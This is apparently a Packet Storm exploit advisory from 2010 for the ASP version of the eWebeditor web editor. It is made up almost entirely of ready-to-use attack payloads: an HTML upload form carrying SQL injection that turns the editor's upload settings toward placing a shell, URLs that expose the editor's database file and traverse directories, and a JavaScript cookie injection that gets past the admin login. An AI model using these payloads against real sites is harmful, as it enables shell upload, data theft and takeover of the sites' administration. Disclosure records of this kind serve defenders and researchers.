eWebeditor Traversal / Shell Upload / Bypass / Disclosure

2010-01-31T00:00:00
ID PACKETSTORM:85779
Type packetstorm
Reporter Pouya Daneshmand
Modified 2010-01-31T00:00:00

Description

                                        
                                            `#################################################################  
# Securitylab.ir  
#################################################################  
# Application Info:  
# Name: eWebeditor  
# Version: ASP  
#################################################################  
Vulnerability:  
  
=======================  
Arbitrary File Upload  
=======================  
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">   
<p align="center">   
<input type=file name=uploadfile size=100><br> <br>   
<input type=submit value=Upload>  </p>  
</form>   
  
  
=======================  
Arbitrary File Upload 2  
=======================  
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup   
  
  
=======================  
Database Disclosure  
=======================  
http://site.com/ewebeditor/db/ewebeditor.mdb   
  
  
=======================  
Administrator bypass  
=======================  
http://site.com/eWebEditor/admin/login.asp  
  
put this code instead URL  
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));  
  
  
=======================  
Directory Traversal  
=======================  
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..  
  
  
=======================  
Directory Traversal 2  
=======================  
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..  
  
  
#################################################################  
# Discoverd By: Pouya Daneshmand  
# Website: http://securitylab.ir  
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com  
###################################################################  
`